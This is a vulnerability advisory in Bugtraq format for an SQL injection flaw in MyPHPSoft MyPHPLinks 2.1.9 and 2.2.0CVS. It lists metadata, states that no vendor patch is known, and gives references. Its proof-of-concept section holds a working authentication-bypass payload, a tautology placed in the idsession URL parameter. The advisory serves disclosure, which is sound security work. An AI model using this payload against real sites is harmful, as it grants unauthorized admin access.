MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing Vulnerability
BID:6395
Info
MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing Vulnerability
| Bugtraq ID: | 6395 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2002 12:00AM |
| Updated: | Dec 14 2002 12:00AM |
| Credit: | Vulnerability discovery credited to "Frog Man" <[email protected]>. |
| Vulnerable: |
MyPHPSoft MyPHPLinks 2.2 .0CVS MyPHPSoft MyPHPLinks 2.1.9 |
| Not Vulnerable: | |
Exploit / POC
MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing Vulnerability
http://www.example.com/admin/index.php?idsession='%20OR%20''='
http://www.example.com/admin/index.php?idsession='%20OR%20''='
Solution / Fix
MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing Vulnerability
References:
References:
- Erreur de securite dans MyphpLinks ? (MyPHPSoft)
- MyPHPLinks (PHP) : SQL Injection ("Frog Man"
)